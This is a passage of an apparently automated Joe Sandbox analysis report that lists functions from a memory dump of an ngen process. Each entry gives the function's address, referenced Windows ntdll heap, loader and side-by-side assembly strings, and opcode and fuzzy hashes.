                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058F21BF
                                                • RtlGetAssemblyStorageRoot, xrefs: 058F2160, 058F219A, 058F21BA
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 058F219F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: c5f2cad279fd16d0b199651aa67425f47ab7ee20945ee5a86d179a96ae72be9b
                                                • Instruction ID: 14fbc45d44fdc33d4bbaebde436651cce5defba2745b9097faed61d3f3ab258c
                                                • Opcode Fuzzy Hash: c5f2cad279fd16d0b199651aa67425f47ab7ee20945ee5a86d179a96ae72be9b
                                                • Instruction Fuzzy Hash: 3531143AB402147AF721AA988C45F9E77ADEB99A44F054059FE06E7340D2B0AE41C7E9
                                                Function 058AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058F02E7
                                                • RTL: Re-Waiting, xrefs: 058F031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058F02BD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                • Instruction ID: b322f39fcb23e464dbb4a3cedfe95021225df058b65b81e5adaad892ea21337e
                                                • Opcode Fuzzy Hash: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                • Instruction Fuzzy Hash: 5FE19D35608745DFE725CF28C888B2AB7E1BB88314F140A59EAA6CB2D1D774ED44CB52
                                                Function 058A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 058A527B
                                                • Kernel-MUI-Language-Disallowed, xrefs: 058A5352
                                                • Kernel-MUI-Number-Allowed, xrefs: 058A5247
                                                • WindowsExcludedProcs, xrefs: 058A522A
                                                • Kernel-MUI-Language-SKU, xrefs: 058A542B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: 12f736216f5a7f62cf6d9015dccb1613976f03426ebcfffd875214eae642a300
                                                • Instruction ID: d58dcfa7b0e92564dbd0a280e1c932df94956aedf31579066ad76bdac120c51f
                                                • Opcode Fuzzy Hash: 12f736216f5a7f62cf6d9015dccb1613976f03426ebcfffd875214eae642a300
                                                • Instruction Fuzzy Hash: D3F14B72E04618EFDF15DFA8C9849EEBBB9FF48610F15405AE905F7210E7749E418BA0
                                                Function 058AD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1975516107
                                                • Opcode ID: 4e0999937dc38dd14897c8ad9e43a78910b19858fc10d39dbcb449c5e5a9c74c
                                                • Instruction ID: 61844fe6741c7258b6e23121081d354becf8579339a1a23f2e8de71500c4b7e9
                                                • Opcode Fuzzy Hash: 4e0999937dc38dd14897c8ad9e43a78910b19858fc10d39dbcb449c5e5a9c74c
                                                • Instruction Fuzzy Hash: 1851F172A093499FEB14DF68C4867ADBBF2BF48318F184459DD02EB681DB74AD41CB80
                                                Function 058776B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: fa012cfade89304fffd987dd0334f15000d93f60e52cab045e84aa7b5c3d1992
                                                • Instruction ID: 2c1318a353a94db99eb0ad9ef7211199ee8b1e03fab557e119a7064bca7a62a6
                                                • Opcode Fuzzy Hash: fa012cfade89304fffd987dd0334f15000d93f60e52cab045e84aa7b5c3d1992
                                                • Instruction Fuzzy Hash: BC012832258248DED229932CE80EF62BBD5EF42A71F2D404AEC15C7651EAA8DC81C671
                                                Function 058970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: cf6c08cec77bc571373124c3247976ca5e0883bb811679a6f85e690217908afb
                                                • Instruction ID: 8328f320c1c9c7a58dc147f3d6585a49da3590b3d233a7737f03bf06059e0f4c
                                                • Opcode Fuzzy Hash: cf6c08cec77bc571373124c3247976ca5e0883bb811679a6f85e690217908afb
                                                • Instruction Fuzzy Hash: 61137E70A0465A9FDF29CF68C494BA9BBB2FF46304F188159D84AEB381D734AD45CF90
                                                Function 05891070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-3570731704
                                                • Opcode ID: 82cf241262c2a9eb8e0ab67d9a6b3974a7f0b08a1483bc278989973026af67c9
                                                • Instruction ID: e36f97b1acb392a61f28fa8eaee121be014e68ad4bd4f3d7d3f75ec17fdca134
                                                • Opcode Fuzzy Hash: 82cf241262c2a9eb8e0ab67d9a6b3974a7f0b08a1483bc278989973026af67c9
                                                • Instruction Fuzzy Hash: 9C923971A09329CFEB24DB18C849FA9B7B6BF45314F0981EAE949E7251D7309E80CF51
                                                Function 0588A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 6edfef4920c00a8cdb9a6b750caded4081fa2e75abd585ac60f9834c67ea2c00
                                                • Instruction ID: 41e3c9a496303dd91ab2f14940609462b683ed7eeb5c69b82c237dd926938b5f
                                                • Opcode Fuzzy Hash: 6edfef4920c00a8cdb9a6b750caded4081fa2e75abd585ac60f9834c67ea2c00
                                                • Instruction Fuzzy Hash: 76C17A742083868BC719EF58C044B7AB7E5FB85728F00486AFD96DB290E738DD49CB52
                                                Function 058B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 058B8591
                                                • LdrpInitializeProcess, xrefs: 058B8422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058B8421
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 058B855E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 09c09d339da255e18607adfc83de6766571c7aafa8971132bf94d44c9e00eb57
                                                • Instruction ID: 437f56d25304c5f8531c765425f7eb17fdc964d3ce16d937052b24d70aba130c
                                                • Opcode Fuzzy Hash: 09c09d339da255e18607adfc83de6766571c7aafa8971132bf94d44c9e00eb57
                                                • Instruction Fuzzy Hash: 62915E71608344AFE721EB24C855FABBAEDBB84654F40092EFE85D2250E774DE44CB53
                                                Function 058B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058F21D9, 058F22B1
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058F22B6
                                                • SXS: %s() passed the empty activation context, xrefs: 058F21DE
                                                • .Local, xrefs: 058B28D8
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 5a1371adaa2457b4f44d76a1a707945f4f8f422c0b06a747ddccb154d383c690
                                                • Instruction ID: baf9f1cd9be4ce2f5cc8b9248c15e4e7b4ffccba2843a908e470069465bb1ed6
                                                • Opcode Fuzzy Hash: 5a1371adaa2457b4f44d76a1a707945f4f8f422c0b06a747ddccb154d383c690
                                                • Instruction Fuzzy Hash: 0BA17A39A042299BDB24DF64CC88BA9B3B5BF58314F1441EADD0AEB351D7709E81CF90
                                                Function 058864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058E10AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 058E106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 058E1028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 058E0FE5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 58301a19e96f21c1e307b41b526545f404e2f42f781ec25e3f3a179cae4b9669
                                                • Instruction ID: 7f13dc2fa0203f694a9e6b573a11510648a113a11da0e830f9351fd7bb873374
                                                • Opcode Fuzzy Hash: 58301a19e96f21c1e307b41b526545f404e2f42f781ec25e3f3a179cae4b9669
                                                • Instruction Fuzzy Hash: D87190B16043049FCB20EF19C889FA77BA9EF55754F440468FD49CB286E774D988CB92
                                                Function 0587F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 0-2586055223
                                                • Opcode ID: ecb2515b1c01d8b4dcd28edb3ad794bc9cd5dc832519dae701767fc17f2fab38
                                                • Instruction ID: dea35cbeca7a13cac106be856672456266614c0ec7662a8d4e3f2699d0fc5b2a
                                                • Opcode Fuzzy Hash: ecb2515b1c01d8b4dcd28edb3ad794bc9cd5dc832519dae701767fc17f2fab38
                                                • Instruction Fuzzy Hash: 2861B0722047889FD721DB28C849F76B7EAFF80754F180469EE95CB291D634ED41CB62
                                                Function 059311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                • Opcode ID: 8b4adaf90e3ad42bb354eb06b8e36a5fad94eb6d9ee5cfba6d31d9c21ab6ef35
                                                • Instruction ID: 9e53d60138c246d355dc009af5c122aa954aaaa79c827891783dabea5c93932e
                                                • Opcode Fuzzy Hash: 8b4adaf90e3ad42bb354eb06b8e36a5fad94eb6d9ee5cfba6d31d9c21ab6ef35
                                                • Instruction Fuzzy Hash: 13310235214214EFD710DB98CC8AFA6B7EAFF08624F190055FC52CB2A0EA75EC40EB65
                                                Function 058A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 058EA992
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058EA9A2
                                                • LdrpDynamicShimModule, xrefs: 058EA998
                                                • apphelp.dll, xrefs: 058A2462
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: ffd64aec821d8d6c5af76c14a8b1bfc3d0c292ea888f063cc2064e78ea868394
                                                • Instruction ID: 419111e8b10011ff4ab09645de20adaca537c1c6c41e9dd75f08db7ed342eeef
                                                • Opcode Fuzzy Hash: ffd64aec821d8d6c5af76c14a8b1bfc3d0c292ea888f063cc2064e78ea868394
                                                • Instruction Fuzzy Hash: 26311332714305ABDB24AF68C84AEBA7BB6FB85B04F16005AFC11E7240DB745C41D780
                                                Function 05879148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 2cb6e8d763ae5f8e87b5e3ce43821b7fed24ea664c0f79326b254a43d6d7d9fa
                                                • Instruction ID: 94b18d9cad8e77a0c7e6a361a62122c2cee4d961dc886e2320ab1fb4cea54057
                                                • Opcode Fuzzy Hash: 2cb6e8d763ae5f8e87b5e3ce43821b7fed24ea664c0f79326b254a43d6d7d9fa
                                                • Instruction Fuzzy Hash: 88319E36700208EFCB11EB59C888FAAB7F9EF45621F154055EC15E7290EA78ED40CA71
                                                Function 059294E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $0
                                                • API String ID: 0-3352262554
                                                • Opcode ID: e089a313af56e2013307f48ffa3d5c4c9474d86418b0108a0a34cf1e932835d9
                                                • Instruction ID: cbb1821fd0a3a2ebfcbbb4a1aa69b344721f5d682b7913a91196e8cf5f30ecc9
                                                • Opcode Fuzzy Hash: e089a313af56e2013307f48ffa3d5c4c9474d86418b0108a0a34cf1e932835d9
                                                • Instruction Fuzzy Hash: 303213B16083918FD720CF68C584B6BBBE9BF88344F04492EF59987354D775E988CB52
                                                Function 05890770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: e9e66db69cce554cd70c05da6ef6538623771c21ed88c13cf97a9d8dcc474edc
                                                • Instruction ID: a3dc480aa93b94d5b7ae709c8071d66c0e29ff847bf60452c704ecc697e23799
                                                • Opcode Fuzzy Hash: e9e66db69cce554cd70c05da6ef6538623771c21ed88c13cf97a9d8dcc474edc
                                                • Instruction Fuzzy Hash: 2AF17A3470460AEFDB19CF68C898F6AB7B6FB45308F184169E816DB381D734AD81CB91
                                                Function 05881460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 05881712
                                                • HEAP: , xrefs: 05881596
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05881728
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: ef2e12f5ff85967fdd8f46a3c3743c944c2d8188c3211517dbefdce275115fe3
                                                • Instruction ID: d01170e7768712d8a414a1410596dbc737e7dcbe2547543526da2b8d9ff2b3cb
                                                • Opcode Fuzzy Hash: ef2e12f5ff85967fdd8f46a3c3743c944c2d8188c3211517dbefdce275115fe3
                                                • Instruction Fuzzy Hash: BEE1CD30A046459BCB29DF68C499BBABBE2FF44304F18845DED96CB245EB34EC46CB50
                                                Function 0588B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: 1877a4b3c72fc7d41f12b858fca980a0b593ce0beac20de764b56477e44a0e70
                                                • Instruction ID: e4fe2b78f3bc3f2af7ac5f4571b9bd88e68fac9ea1ba88a4d9d0724b959632f7
                                                • Opcode Fuzzy Hash: 1877a4b3c72fc7d41f12b858fca980a0b593ce0beac20de764b56477e44a0e70
                                                • Instruction Fuzzy Hash: DDB18A31A087589BDB25EF69C981BADB7B6FF85314F154829EC56EB280DB30EC40CB40
                                                Function 0590368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: 717a9299a83e8f13b3677eab1b49dd41dee69956e14f5161bff0653b8a642817
                                                • Instruction ID: 733509fe01bb649dc56d49a27f2230e239f006bef154a55795b2dc0d2a9a2d9b
                                                • Opcode Fuzzy Hash: 717a9299a83e8f13b3677eab1b49dd41dee69956e14f5161bff0653b8a642817
                                                • Instruction Fuzzy Hash: A9B19B72618745AFE721DE58C885F6BBBE8BB44710F041C2AFA51DB290DB74EC44CB92
                                                Function 0587A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 6d9dff4e75064a7b0e117c183038834b1f740bb0a9b292b164f2aa0589f37373
                                                • Instruction ID: fe50d229da4c9ec7f796b3a250aeb113bdceba130484834d8cc4c7aeacb05e25
                                                • Opcode Fuzzy Hash: 6d9dff4e75064a7b0e117c183038834b1f740bb0a9b292b164f2aa0589f37373
                                                • Instruction Fuzzy Hash: ADA169759116289BDB219F68CC88BAAB7B9FF44710F0001EAED09E7250DB359EC4CF50
                                                Function 059136EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: 21ba608a087448d2198848f101ca695651379a2628fa1dc9ff0a623c1e3dcc12
                                                • Instruction ID: 19980bf9ff756ee3cc2def5b38cb0fdd7e63e3bba2addb2d1370425e464bd35a
                                                • Opcode Fuzzy Hash: 21ba608a087448d2198848f101ca695651379a2628fa1dc9ff0a623c1e3dcc12
                                                • Instruction Fuzzy Hash: 12819971608358AFE721DB18C844B2ABBF8FF84750F080D69BD86DB290DB34D9048B96
                                                Function 0588B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-373624363
                                                • Opcode ID: 8853bba234c27da0863f61ad8025ad9e716b35b56e477c000a85f06528e567df
                                                • Instruction ID: fa905ab0c89db181ec31544c0aa6e6766b567e79eb8ae041a724dbdf537019c1
                                                • Opcode Fuzzy Hash: 8853bba234c27da0863f61ad8025ad9e716b35b56e477c000a85f06528e567df
                                                • Instruction Fuzzy Hash: 5491BB71A08219CBDB21DF98C940BBE77B1FF82325F144595EC52EB290D778AE45CB90
                                                Function 058B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                • Opcode ID: 281a192985e30a1a8d52443bf1fa86aaa8ef4140730de3c00ad8a0923a2d0bea
                                                • Instruction ID: f99fae41c7331def090e633290c6a9a4f5899d2a1214cf588db622ddf107f1c9
                                                • Opcode Fuzzy Hash: 281a192985e30a1a8d52443bf1fa86aaa8ef4140730de3c00ad8a0923a2d0bea
                                                • Instruction Fuzzy Hash: 3B7190706093059FEB14DF24C584AABBBEABF88618F10491DEEA6C7350D771DD05CB52
                                                Function 0595B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                • GlobalizationUserSettings, xrefs: 0595B834
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0595B82A
                                                • TargetNtPath, xrefs: 0595B82F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: 7ba8fa74699c3d2cc436b43e8de9f629e5565c5e5ba545a72a31b082377dbea4
                                                • Instruction ID: 51eba58bda7a4c931341dc46d9894eee1547f16e7d16408759cc182ac80948c5
                                                • Opcode Fuzzy Hash: 7ba8fa74699c3d2cc436b43e8de9f629e5565c5e5ba545a72a31b082377dbea4
                                                • Instruction Fuzzy Hash: A5617F32A4162CABDB21DF54CC98BE9B7B9BF04764F0501E5E909E7250DB749E80CF90
                                                Function 0587F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 058DE6A6
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 058DE6C6
                                                • HEAP: , xrefs: 058DE6B3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: ab19cbf40f4bb533a0412715ae28bea4c7b617f019f0de03b74c14a5cffd4023
                                                • Instruction ID: 2c25fd5174744a79941b1569edc6547caa11f30bbe383788dc31db4d06061e3d
                                                • Opcode Fuzzy Hash: ab19cbf40f4bb533a0412715ae28bea4c7b617f019f0de03b74c14a5cffd4023
                                                • Instruction Fuzzy Hash: DC51D231604648EFD712DBA8C899F6ABBF9BF05344F0400A4EE41CB692D774ED40CB61
